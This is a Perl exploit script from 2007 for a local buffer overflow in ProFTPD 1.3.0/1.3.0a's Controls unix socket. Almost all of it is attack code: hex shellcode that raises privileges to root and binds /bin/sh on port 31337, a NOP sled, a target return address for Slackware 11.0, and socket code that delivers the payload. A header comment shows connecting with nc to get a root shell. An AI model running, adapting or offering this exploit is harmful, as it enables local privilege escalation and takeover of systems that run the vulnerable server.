revenge_proftpd_ctrls_24.pl.txt
Posted on 20 February 2007
#!/usr/bin/perl -w # # $Id: revenge_proftpd_ctrls_24.pl, v1.0 2007/02/18 19:24:22 revenge Exp $ # # ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit # [Old style school sploit against gcc 3.x and linux kernel 2.4] # # Original Advisory : # http://www.coresecurity.com/?action=item&id=1594 # # [ Exploitation condition ] # - proftpd must be compiled with --enable-ctrls option # - local user needs permission to connect through unix socket (from proftpd.conf) # # This one works for 2.4 exploitation against gcc 3.x # Payload will bind /bin/sh on port 31337 with ( uid && gid = 0 ) # I was able to use only a <bind_shell> as payload since a normal setuid + execve seems that doesn't work # # Tested against: # - ProFTPD 1.3.0/1.3.0a on Slackware 11.0 compiled with gcc 3.4.6 # *** Against v1.3.0a -- server *could* remain up (in a Denial of Service condition) without binding shell # # revenge@darklight~$ ./revenge_proftpd_ctrls_24.pl /usr/local/var/proftpd/proftpd.sock 1 # [ wait some secs then nc on port 31337 ] # anyone@anywhere:~$ nc <host> 31337 # id # uid=0(root) gid=0(root) groups=50(ftp) # exit # [ after that server will deactivate ] # # Alfredo "revenge" Pesoli # # http://www.0xcafebabe.it/ # <revenge@0xcafebabe.it> # use strict; use Socket; if ( @ARGV < 2 ) { &usage(); } my $hellcode = # *** Generated with libShellCode # setuid(0) + setgid(0) + bind(/bin/sh) on port 31337 "x31xc0x31xdbxb0x17xcdx80x31xc0x31xdbxb0x2excdx80". "x31xdbxf7xe3xb0x66x53x43x53x43x53x89xe1x4bxcdx80". "x89xc7x31xc9x66xb9x7ax69x52x66x51x43x66x53x89xe1". "xb0x10x50x51x57x89xe1xb0x66xcdx80xb0x66xb3x04xcd". "x80x31xc0x50x50x57x89xe1xb3x05xb0x66xcdx80x89xc3". "x89xd9xb0x3fx49xcdx80x41xe2xf8xebx18x5ex31xc0x88". "x46x07x89x76x08x89x46x0cxb0x0bx89xf3x8dx4ex08x8d". "x56x0cxcdx80xe8xe3xffxffxffx2fx62x69x6ex2fx73x68"; my $rsock = shift; my $tn = shift; my $ret; my $nop = "x90"x200; use constant LSOCK => '/tmp/tmp.sock'; my %targets = ( '1' => "x55xefxffxbf" # Slackware 11.0 # Add here your target RET ); my %tname = ( '1' => "Slackware 11.0" ); $ret = $targets{$tn}; my $buffer = $nop.$hellcode.("$ret"x70); my $l = length($buffer); socket (SOCK, PF_UNIX, SOCK_STREAM, 0) or die "Unable to create socket : $!"; my $rfile = sockaddr_un($rsock); unlink LSOCK; my $lfile = sockaddr_un(LSOCK); bind (SOCK, $lfile) or die "Unable to bind to $lfile"; chmod (00700, LSOCK); connect (SOCK, $rfile) or die " Unable to connect to ".$rsock." Maybe server is down or incorrect path "; print " Request length => ".$l." "; print " Target => ".$tname{$tn}." "; send SOCK, pack("s2", 0),0; send SOCK, pack("s2", 1,0),0; send SOCK, pack("C", 188).pack("C",2).pack("s1",0),0; send SOCK, $buffer,0; close SOCK; print " [#] Request sent - try to connect on port 31337 "; sub usage() { print " ProFTPD 1.3.0/1.3.0a Controls Buffer Overflow [ Old Style school ] "; print " Alfredo "revenge" Pesoli "; print " <revenge@0xcafebabe.it> "; print "Usage : $0 <path_to_unix_socket> <targets> "; print " Ex : $0 /usr/local/var/proftpd/proftpd.sock 1 "; print " Available Targets : "; print " 1 => 0xbfffef55 (Slackware 11.0) "; exit(); }
